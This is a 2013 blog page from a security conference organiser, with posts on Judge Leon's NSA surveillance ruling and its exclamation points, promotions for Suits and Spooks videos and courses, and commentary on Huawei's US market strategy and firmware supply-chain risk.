Wednesday, December 18, 2013

Judge Leon's Three Key Findings Against the NSA that Prompted those Exclamation Points

“He’s very passionate; he uses a lot of italics and exclamation points,” Orin S. Kerr, a professor at the George Washington University Law School and a defender of the N.S.A.’s surveillance programs said referring to the way Judge Leon wrote the decision. Mr. Kerr said he found the judge’s ruling short “on legal reasoning.” (source: The New York Times
There are several exclamation points in this decision. Judge Leon plainly feels that he has been lied to, and that we all have been. And he seems to be done with it. (source: The New Yorker)
Considering the above comments about Judge Leon's use of exclamation points, I thought it might be interesting to see what prompted them. I read his 68 page decision, and found that Judge Leon used exclamation points three times. Here are those instances.

1(a). Plaintiffs Have Standing to Challenge Bulk Telephony Metadata Collection and Analysis.

"The Government argues that Judge Vinson's order names only Verizon Business Network Services ("VBNS") as the recipient of the order, whereas plaintiffs claim to be Verizon Wireless subscribers."

"Put simply, the Government wants it both ways. Virtually all of the Government's briefs and arguments to this Courst explain how the Government has acted in good faith to create a comprehensive metadata database... - in which case the NSA must have collected metadata from Verizon Wireless, the single largest wireless carrier in the United States, as well as AT&T and Sprint, the second and third-largest carriers."

"Yet in one footnote, the Government asks me to find that plaintiffs lack standing based on the theoretical possibility that the NSA has collected a universe of metadata so incomplete that the program could not possibly serve its putative function. Candor of this type defies common sense and does not exactly inspire confidence!" (p. 38)

2. The Collection and Analysis of Telephony Metadata Constitutes a Search.

"First, the pen register in Smith was operational for only a matter of days between March 6, 1976 and March 19, 1976, and there is no indication from the Court's opinion that it expected the Government to retain those limited phone records once the case was over.

"In his affidavit, Acting Assistant Director of the FBI Robert J. Holley himself noted that "[p]en-register and trap-and-trace (PR/TT) devices provide no historical contact information, only a record of contacts with the target occurring after the devices have been installed."

"This short-term, forward-looking (as opposed to historical), and highly-limited data collection is what the Supreme Court was assessing in Smith. The NSA telephony metadata program, on the other hand, involves the creation and maintenance of a historical database containing five years' worth of data."

"And, I might add, there is the very real prospect that the program will go on for as long as America is combatting terrorism, which realistically could be forever!" (p. 47)

3. The Public Interest and Potential Injury to Other interested Parties Also Weigh in Favor of Injunctive Relief.

"("[T]he public interest lies in enjoining unconstitutional searches.") That interest looms large in this case, given the significant privacy interests at stake and the unprecedented scope of the NSA's collection and querying efforts, which likely violate the Fourth Amendment. Thus, the public interest weighs heavily in favor of granting an injunction."

"The Government responds that the public's interest in combating terrorism is of paramount importance - a proposition that I accept without question. But the Government offers no real explanation as to how granting relief to these plaintiffs would be detrimental to that interest. Instead the Government says that it will be burdensome to comply with any order that requires the NSA to remove plaintiffs from its database."

"Of course, the public has no interest in saving the Government from the burdens of complying with the Constitution!" (p.65-66)


Here's the full opinion. It's well-worth reading. The fact is that our interaction with and reliance upon technology has fundamentally changed what privacy means to us today and that will certainly change even more tomorrow. Past court decisions from 30 years ago and longer which have informed current laws protecting our Fourth Amendment rights should be re-visited and updated to meet today's new reality of instant communication, geolocation, and data analytics.

Sunday, December 8, 2013

If You Missed Suits and Spooks NY, Here It Is On Video

O'Reilly Media, the publisher of my book Inside Cyber Warfare, has produced a video compilation of our Suits and Spooks event. I'm proud to say that this is the first non-O'Reilly conference that they have produced for sale and it looks great. It doesn't include every speaker because some of the talks were under Chatham House rules, but here are the speakers that are included:
  • The Top 50 Non-state Hacker Groups in the World - Christopher Ahlberg (CEO of RecordedFuture)
  • Out of the Mountains: A Future of Feral Cities, Urban Systems Under Stress, and Increasing Overlaps Between the Real and Virtual Worlds - David Kilcullen (CEO of Caerus Associates)
  • Emerging Bad Actors in the Virtual and Physical Worlds (Jeffrey Carr, Moderator with Dr. David Kilcullen, Jonathan Hutson, Thomas Dzieran, Aaron Weisburd, Peter Mattis, and John Scott-Railton)
  • How to Survive a Surveillance-friendly Environment - Mike Janke (Co-founder, CEO of Silent Circle)
  • Should Defensive Strategies be Specific to the Threat Actor or Generalized for all Threat Actors? (Jeffrey Carr, Moderator with Pierre-Marc Bureau (ESET), Derek Manky (Fortinet), Roel Schouwenberg (Kaspersky), Chris Coleman (LookingGlass), Brian Carrier (Basis Technology))
  • Real-time Depiction of the Global Cyber Threat Landscape - Chris Coleman
  • Icefog: Mercenary Hackers Who Focus on Supply Chain Attacks in Asia - Roel Schouwenberg
  • Joseph Kony, the LRA and Elephant Poaching in Africa - Jonathan Hutson
The complete series is only $149. Here's where to order. We're going to be offering this again for Suits and Spooks DC so please let me know what you think.

Tuesday, December 3, 2013

Three Suits and Spooks Courses taught by 3 World-Renowned Experts: Limited Enrollment and Savings!

At Suits and Spooks events, we always have world-class speakers. But for 2014, I wanted to offer world-class training as well. For example, in January we're featuring:

CARMEN MEDINA: Specialist leader at Deloitte Consulting LLP after retiring from an almost 32 years-career at the Central Intelligence Agency where her roles included Director of the Center for the Study of Intelligence (CSI); the Deputy Director for Intelligence, and Chief of the Strategic Assessments Group in the Office of Transnational Issues, Directorate of Intelligence. She has led analysts working on Southern Africa and Central America, and helped to design the Global Coverage Program and innovate new production methods to support policymakers. In the early 1990s, she served overseas in Western Europe.

Course title: "Analytic Methodology and Critical Thinking for Cyber Intelligence and Information Security"

LANCE COTTRELL: Chief Scientist at Ntrepid Corp. and the founder and principal at Obscura Security. He founded Anonymizer Inc. in 1995, and is an internationally recognized expert in cryptography‚ online privacy‚ and Internet security.

Course title: "Tools, Techniques, and Pitfalls in Internet Anonymity and Pseudonymity"

ROB DUBOIS: Security advisor, smart power authority and retired U.S. Navy SEAL with experience in more than thirty nations. He recently served as the operations manager for the Department of Defense Red Team where his innovative tactics earned him the reputation of the U.S.’s “top terrorist”. Rob has provided his “Think like the Adversary” workshop to elite military units in combat zones, Fortune 500 companies, and agencies including the National Counterterrorism Center.

Course title: "Better Red than Dead: Learn to build your own full-spectrum Red Team with a veteran Red Team leader"

Originally, in order to attend a workshop you needed to also register for the conference. I've changed that policy so now you can take the training without having to register for Suits and Spooks DC, or you can register for both. Basically, it's now your choice.

Finally, in order to help us fill up these courses so as to have a more effective test on whether this is something that we continue to offer at Suits and Spooks events, I've lowered the tuition by 33% on all 3 courses until December 20th.

You can get complete details on each course by clicking on the course title, or call us with any questions you may have. Please help spread the word about this unique opportunity to learn from these highly esteemed professionals. Depending on our enrollment numbers, it may be the only time that we offer it.

Monday, December 2, 2013

What Does Huawei's Announcement of Exiting the U.S. Market Really Mean?

Last night, my Google Alert for Huawei captured an intriguing headline: "Huawei exiting US market: CEO". The article appeared in Global Times, a Chinese paper that's part of Peoples Daily. Here's the opening paragraph:
Chinese telecommunications equipment maker Huawei Technologies Co Ltd has exited the US market in order not to affect Sino-US relations, Ren Zhengfei, founder and CEO of Huawei, said in an interview in Paris, news portal reported Sunday.
Upon first reading, this raised a lot of questions in my mind regarding Huawei's current U.S. operations. It has offices in a number of U.S. cities and has already sold quite a bit of equipment to both U.S. corporations and the U.S. government. What would happen there, I wondered?

Fortunately, I was able to reach Bill Plummer, Huawei's VP of External Affairs by email and received the following clarification:
Huawei has prioritized markets that welcome competition and investment, such as Europe.  
That said, we remain committed to our customers, employees, investments and operations and more than $1 billion in sales in the U.S., and we stand ready to deliver additional competition and innovative solutions as desired by customers and allowed by authorities.
So basically what seemed like a radical change of strategy is actually something very practical. Huawei isn't pulling out of the U.S. physically nor is it abandoning its current U.S. customers. It is simply re-allocating its resources to increase sales in those parts of the world where it is welcome to compete.

Personally, as someone who has been a frequent critic of Huawei, I think it's a smart strategy. They're already the world's largest telecommunications hardware manufacturer. Why should they risk engendering more controversy by continuing to battle against U.S. government resistance when it will do nothing to improve their bottom line? In my opinion, Huawei's combination of low prices and quality manufacturing will eventually force adoption by U.S. corporations and government agencies. It might take years but I think that will be the inevitable outcome.

In the meantime, instead of hoping that the U.S. government will keep potential adversary states from selling them risky devices, U.S. companies should incentivize cyber security researchers to find ways to automatically test firmware updates for exploits. Currently, whether the hardware is made by Huawei, ZTE, or Dell, firmware updates are loaded automatically with no testing. If, down the road, a foreign intelligence agency (Chinese or otherwise) wants to compromise a strategically placed router made by a company that it has legal authorities over by adding a bit of malicious code, a firmware update is one of the easiest ways to do it.

As a side note I'm happy to say that both Bill Plummer and Andy Purdy (Huawei's CSO) will be at Suits and Spooks DC. Andy will be speaking on a panel that I'm moderating which will explore cyber security risks in the supply chain. We still have about 28 seats available if you'd like an opportunity to discuss Huawei and related cyber security issues with a couple of the company's executives face-to-face.